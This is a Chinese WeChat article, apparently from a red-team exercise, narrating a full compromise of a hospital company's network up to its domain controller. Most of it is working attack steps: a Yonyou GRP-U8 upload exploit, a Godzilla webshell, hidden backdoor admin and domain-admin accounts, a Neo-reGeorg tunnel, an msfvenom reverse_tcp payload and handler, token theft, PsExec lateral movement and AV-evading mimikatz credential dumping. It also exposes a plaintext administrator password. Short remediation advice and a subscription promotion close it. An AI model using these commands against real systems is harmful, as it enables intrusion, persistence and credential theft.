不是星标不推送文章了。
师傅也不想吧~
快把极梦C设置成星标吧。
二
靶标信息
本次靶标如下
漏洞目标:http://x.x.x.x:8000/公司官网:http://xxx.com/联系方式:1888888888(同微信)联系方式:hr@888888.com涉及单位:XX医院有限责任公司注册资本:9166.67万元人民币单位地址:xxxxxxxxxxxxxxxxxxx
三
开始攻击
步骤一:检测抓取XXX在网络中的资产分布,检测到以下地址为其行政事业财务管理系统界面(那肯定有戏了阿)
步骤二:目录扫描检测是否存在漏洞发现用友 GRP-U8 UploadFileData接口并下载以下项目执行命令进行漏洞检测....发现存在漏洞
#项目地址https://github.com/xanszZZ/YY_upfile#安装pocsuite3pip3 install -i https://pypi.tuna.tsinghua.edu.cn/simple pocsuite3#进行漏洞检测pocsuite -r YY_upfile.py -f file.txt
步骤三:使用攻击脚本攻击成功后访问以下页面进行漏洞验证....查看是否上传存在漏洞即可尝试获取网站后门
http://X.X.X.X:8000/R9iPortal/debugg.jsp
步骤四:在以上项目的攻击脚本中将测试代码data变量中的值修改为一句话木马进而执行以下命令获取网站后门.....
#攻击命令pocsuite -r YY_upfile2.py -f file.txt
步骤五:以执行成功后拼接访问以下地址为网站后门地址...进行验证;返回空白页面说名成功并使用哥斯拉客户端连接验证 Bingo!
http://X.X.X.X:8000/R9iPortal/U8date.jsp //哥斯拉默认连接
步骤六:在使用哥斯拉连接上网站后门进行简单的信息收集如下...
whoamihostnameipconfig /allsysteminfotasklist /svcnet time /domainnetstat -annet user 4pts$ 123admiN@ /addnet localgroup administrators 4pts$ /addnet user 4k 123admiN /add /doaminnet group "Domain Users" /domainnet user 4pts$ 123admiN@ /addnet localgroup administrators 4pts$ /add
步骤七:判断出存在域环境直接执行上线...
步骤八:由于只有内网IP地址且已经开启RDP服务,故需要在此搭建通信隧道进行远程桌面连接,部署Neo-Regorg并访问,本地执行命令与边界主机建立通信隧道....
http://X.X.X.X:8000/showstatus.jsppython3 neoreg.py -k 123admiN -u http://X.X.X.X:8000/showstatus.jsp
步骤九:开启SockCap64软件并配置好代理进行测试...成功
步骤十:在Sockcap64上开启远程桌面连接并输入以上步骤中创建的本地账号(系统后门)进行连接...
步骤十一:开始进行内网信息收集....执行以下命令并获取信息
logonpasswords //username:Administrator password:P@ssword2adminshell net group "Domain Computers" /domain //255台主机C:/Users/Administrator.WUHANKQ/ //文件修改日期2022年12月7日
步骤十二:尝试使用读取出的本地账号与明文密码对域控进行PTH攻击且失败无果.....存在以下攻击思路!
1.进一步扫描获取更多的信息,但是动静会很大~暂且备用2.本地机器上存在域管理员的用户文件夹~可优先尝试窃取该用户的会话令牌
步骤十三:选择第二个攻击思路!直接在哥斯拉中反弹MSF的Shell....失败;生成MSF上传执行上线....
payload windows/meterpreter/reverse_tcp //反弹失败payload java/meterpreter/reverse_tcp //反弹成功 无法获取会话令牌msfvenom -p windows/meterpreter/reverse_tcp LHOST=X.X.X.X LPORT=6666 -f exe -o Sysupdate.exemsfconsole //启动MSF的漏洞攻击框架use exploit/multi/handler //调用木马监听模块set payload windows/meterpreter/reverse_tcp //设置木马服务端类型set lhost 10.0.20.3 //设置监听的地址set lport 6666 //设置监听的端口run //启动当前的监听
步骤十四:开始窃取域管理员的会话令牌并验证...
#Meterpreter操作use incognito //进入incognito模块list_tokens -u //列出令牌impersonate_token "WUHANKQAdministrator" //选择要窃取的账号#验证权限shellchcp 65001 //活动代码页字符为UTF-8编码whoami
步骤十五:尝试在Meterpreter中创建域控管理员账户...失败;在CMD下执行创建成功;
add_user username password -h 域控IPadd_group_user "Domain Admins" username -h 域控IPadd_user 24k 123admiN@ -h 172.16.0.20add_group_user "Domain Admins" 24k -h 172.16.0.20chcp 65001net user 24k 123admiN@ /add /domainnet group "Domain Admins" 24k /add /domainnet group "Domain Admins" /domainnet group "Administrators" 24k /add /domain
步骤十六:已经获取域管理后门账号尝试在边界主机上对域控进行远程登陆....失败;
username:wuhankq24kpassword:123admiN@
步骤十七:出现以下问题,网上给出的解决方案需要在目标终端中执行以下命令【没卵用】...尝试横向移动到域控
sfc /scannow //无果net use \172.16.0.20 /u:wuhankq24k 123admiN@ //建立IPC$连接net use //查看已经建立的IPC$连接PsExec64.exe \172.16.0.20 -s cmd.exe -accepteula //反弹cmddir \172.16.0.20c$ //查看默认的C盘共享copy SystemUpdate.exe \172.16.0.20c$ //拷贝本地CS马执行上线
步骤十八:在域控上执行命令查询存在的防护软件为卡巴斯基,这里对mimikatz进行源码免杀上传执行...
#AV查询shell tasklist /svcKasperskyKaspersky#明文抓取privilege::debugsekurlsa::logonpasswords
成功拿下域控
四
修复建议
1、升级用友GRP-U8管理系统并打上最新的补丁文件
2、域控策略中设置域管理员禁止登陆除域控的其他主机
3、增强用户密码强度 并设置定期修改密码的用户策略
正式运营星球:
1.src真实漏洞挖掘案例分享(永久不定时更新),过程详细一看就会哦。
2.自研/二开等工具/平台的分享。
3.漏洞分析/资料共享等。
ps:漏洞都是加班加点挖到的,最近白嫖的人日益增多越来越多。
白嫖党过多,增加了新人阅读权限,3天就解除。
关于文章/Tools获取方式:请关注交流群或者知识星球。
关于交流群:因为某些原因,更改一下交流群的获取方式:
1.请点击联系我们->联系官方->客服小助手添加二维码拉群 。
关于知识星球的获取方式:
1.后台回复发送 "知识星球",即可获取知识星球二维码。
2如若上述方式不行,请点击联系我们->联系官方->客服小助手添加二维码进入星球 。
3.为了提高质量,推出"免费名人堂"名额,后台回复发送 "知识星球"了解详情。
本公众号文章以技术分享学习为目的。
由于传播、利用本公众号发布文章而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号及作者不为此承担任何责任。
一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除并致歉。谢谢!
原文始发于微信公众号(极梦C):某次hvv中打穿某单位域控
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论